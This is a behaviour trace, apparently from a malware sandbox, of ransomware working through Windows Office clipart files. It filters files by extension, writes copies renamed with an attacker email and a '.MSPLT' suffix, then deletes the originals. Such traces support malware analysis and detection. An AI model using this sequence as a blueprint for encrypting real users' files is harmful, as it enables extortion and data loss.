returned 1 [0320.517] lstrlenW (lpString=".xlsx") returned 5 [0320.517] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1 [0320.517] lstrlenW (lpString=".ppt") returned 4 [0320.517] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.517] lstrlenW (lpString=".zip") returned 4 [0320.517] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.517] lstrlenW (lpString=".rar") returned 4 [0320.517] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.517] lstrlenW (lpString=".bz2") returned 4 [0320.517] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.517] lstrlenW (lpString=".7z") returned 3 [0320.517] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.517] lstrlenW (lpString=".dbf") returned 4 [0320.517] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.517] lstrlenW (lpString=".1cd") returned 4 [0320.517] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.518] lstrlenW (lpString=".jpg") returned 4 [0320.518] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.518] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.518] lstrlenW (lpString="PARNT_08.MID") returned 12 [0320.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.520] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=7347) returned 1 [0320.520] CloseHandle (hObject=0x53c) returned 1 [0320.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid")) returned 0x220 [0320.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.521] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.521] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0320.522] GetLastError () returned 0x0 [0320.522] ReadFile (in: hFile=0x53c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1cb3, lpOverlapped=0x0) returned 1 [0320.524] WriteFile (in: hFile=0x52c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x1cc0, lpOverlapped=0x0) returned 1 [0320.526] ReadFile (in: hFile=0x53c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.526] WriteFile (in: hFile=0x52c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.526] SetEndOfFile (hFile=0x52c) returned 1 [0320.526] CloseHandle (hObject=0x52c) returned 1 [0320.527] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.527] SetEndOfFile (hFile=0x53c) returned 1 [0320.531] CloseHandle (hObject=0x53c) returned 1 [0320.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.532] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid")) returned 1 [0320.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.533] lstrlenW (lpString=".doc") returned 4 [0320.534] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.534] lstrlenW (lpString=".docx") returned 5 [0320.534] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1 [0320.534] lstrlenW (lpString=".pdf") returned 4 [0320.534] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.534] lstrlenW (lpString=".xls") returned 4 [0320.534] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.534] lstrlenW (lpString=".xlsx") returned 5 [0320.534] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1 [0320.534] lstrlenW (lpString=".ppt") returned 4 [0320.534] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.534] lstrlenW (lpString=".zip") returned 4 [0320.534] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.534] lstrlenW (lpString=".rar") returned 4 [0320.534] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.534] lstrlenW (lpString=".bz2") returned 4 [0320.672] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.672] lstrlenW (lpString=".7z") returned 3 [0320.672] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.673] lstrlenW (lpString=".dbf") returned 4 [0320.673] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.673] lstrlenW (lpString=".1cd") returned 4 [0320.673] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.673] lstrlenW (lpString=".jpg") returned 4 [0320.673] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.673] lstrlenW (lpString=".doc") returned 4 [0320.673] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.673] lstrlenW (lpString=".docx") returned 5 [0320.673] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1 [0320.673] lstrlenW (lpString=".pdf") returned 4 [0320.673] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.673] lstrlenW (lpString=".xls") returned 4 [0320.674] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.674] lstrlenW (lpString=".xlsx") returned 5 [0320.674] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1 [0320.674] lstrlenW (lpString=".ppt") returned 4 [0320.674] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.674] lstrlenW (lpString=".zip") returned 4 [0320.674] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.674] lstrlenW (lpString=".rar") returned 4 [0320.674] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.674] lstrlenW (lpString=".bz2") returned 4 [0320.674] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.674] lstrlenW (lpString=".7z") returned 3 [0320.674] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.674] lstrlenW (lpString=".dbf") returned 4 [0320.674] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.674] lstrlenW (lpString=".1cd") returned 4 [0320.674] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 68 [0320.675] lstrlenW (lpString=".jpg") returned 4 [0320.675] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.675] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.675] lstrlenW (lpString="PARNT_09.MID") returned 12 [0320.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0321.717] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=6764) returned 1 [0321.718] CloseHandle (hObject=0x420) returned 1 [0321.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid")) returned 0x220 [0321.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0321.722] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.722] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0321.725] GetLastError () returned 0x0 [0321.725] ReadFile (in: hFile=0x420, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1a6c, lpOverlapped=0x0) returned 1 [0321.738] WriteFile (in: hFile=0x488, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x1a70, lpOverlapped=0x0) returned 1 [0321.741] ReadFile (in: hFile=0x420, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0321.741] WriteFile (in: hFile=0x488, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0321.741] SetEndOfFile (hFile=0x488) returned 1 [0321.741] CloseHandle (hObject=0x488) returned 1 [0321.741] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.741] SetEndOfFile (hFile=0x420) returned 1 [0321.747] CloseHandle (hObject=0x420) returned 1 [0321.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0321.748] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid")) returned 1 [0321.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.749] lstrlenW (lpString=".doc") returned 4 [0321.749] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0321.749] lstrlenW (lpString=".docx") returned 5 [0321.749] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1 [0321.749] lstrlenW (lpString=".pdf") returned 4 [0321.749] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0321.749] lstrlenW (lpString=".xls") returned 4 [0321.750] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0321.750] lstrlenW (lpString=".xlsx") returned 5 [0321.750] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1 [0321.750] lstrlenW (lpString=".ppt") returned 4 [0321.750] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0321.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.750] lstrlenW (lpString=".zip") returned 4 [0321.750] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0321.750] lstrlenW (lpString=".rar") returned 4 [0321.750] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0321.750] lstrlenW (lpString=".bz2") returned 4 [0321.750] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0321.750] lstrlenW (lpString=".7z") returned 3 [0321.750] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0321.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.750] lstrlenW (lpString=".dbf") returned 4 [0321.750] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0321.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.751] lstrlenW (lpString=".1cd") returned 4 [0321.751] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0321.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.751] lstrlenW (lpString=".jpg") returned 4 [0321.751] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0321.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.751] lstrlenW (lpString=".doc") returned 4 [0321.751] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0321.751] lstrlenW (lpString=".docx") returned 5 [0321.751] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1 [0321.751] lstrlenW (lpString=".pdf") returned 4 [0321.751] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0321.751] lstrlenW (lpString=".xls") returned 4 [0321.751] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0321.751] lstrlenW (lpString=".xlsx") returned 5 [0321.752] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1 [0321.752] lstrlenW (lpString=".ppt") returned 4 [0321.752] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0321.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.752] lstrlenW (lpString=".zip") returned 4 [0321.752] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0321.752] lstrlenW (lpString=".rar") returned 4 [0321.752] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0321.752] lstrlenW (lpString=".bz2") returned 4 [0321.752] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0321.752] lstrlenW (lpString=".7z") returned 3 [0321.752] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0321.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.752] lstrlenW (lpString=".dbf") returned 4 [0321.752] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0321.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.752] lstrlenW (lpString=".1cd") returned 4 [0321.752] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0321.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 68 [0321.753] lstrlenW (lpString=".jpg") returned 4 [0321.753] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0321.753] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0321.753] lstrlenW (lpString="SCHOL_02.MID") returned 12 [0321.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0321.757] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=5058) returned 1 [0321.757] CloseHandle (hObject=0x420) returned 1 [0321.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid")) returned 0x220 [0321.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0321.758] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.758] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0321.760] GetLastError () returned 0x0 [0321.760] ReadFile (in: hFile=0x420, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x13c2, lpOverlapped=0x0) returned 1 [0321.782] WriteFile (in: hFile=0x488, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x13d0, lpOverlapped=0x0) returned 1 [0321.785] ReadFile (in: hFile=0x420, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0321.785] WriteFile (in: hFile=0x488, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0321.785] SetEndOfFile (hFile=0x488) returned 1 [0321.785] CloseHandle (hObject=0x488) returned 1 [0321.786] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.786] SetEndOfFile (hFile=0x420) Thread: id = 47 os_tid = 0xe1c [0283.166] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x38f3bd0 [0283.167] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x3903bd8 [0283.167] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc4e0 [0283.167] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b598 [0283.167] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc450 [0283.167] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x3db7020 [0283.171] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc528 [0283.171] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc528, Size=0x20) returned 0x4ade30 [0283.171] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc528 [0283.171] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc528, Size=0x20) returned 0x4ae010 [0283.171] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0283.171] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0283.171] Wow64DisableWow64FsRedirection (in: OldValue=0x349ff50 | out: OldValue=0x349ff50*=0x0) returned 1 [0283.171] lstrlenW (lpString="kernel32.dll") returned 12 [0283.171] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ade30 | out: hHeap=0x470000) returned 1 [0283.171] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0283.171] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae010 | out: hHeap=0x470000) returned 1 [0283.171] Sleep (dwMilliseconds=0x64) [0283.490] lstrcmpiW (lpString1=".MARKER", lpString2=".MSPLT") returned -1 [0283.490] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0283.490] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0283.505] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=0) returned 1 [0283.505] CloseHandle (hObject=0x34c) returned 1 [0283.506] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.506] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.506] lstrlenW (lpString=".doc") returned 4 [0283.506] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0283.506] lstrlenW (lpString=".docx") returned 5 [0283.506] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0283.506] lstrlenW (lpString=".pdf") returned 4 [0283.506] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0283.506] lstrlenW (lpString=".xls") returned 4 [0283.506] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString=".xlsx") returned 5 [0283.507] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0283.507] lstrlenW (lpString=".ppt") returned 4 [0283.507] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.507] lstrlenW (lpString=".zip") returned 4 [0283.507] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString=".rar") returned 4 [0283.507] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString=".bz2") returned 4 [0283.507] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString=".7z") returned 3 [0283.507] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0283.507] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.507] lstrlenW (lpString=".dbf") returned 4 [0283.507] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0283.507] 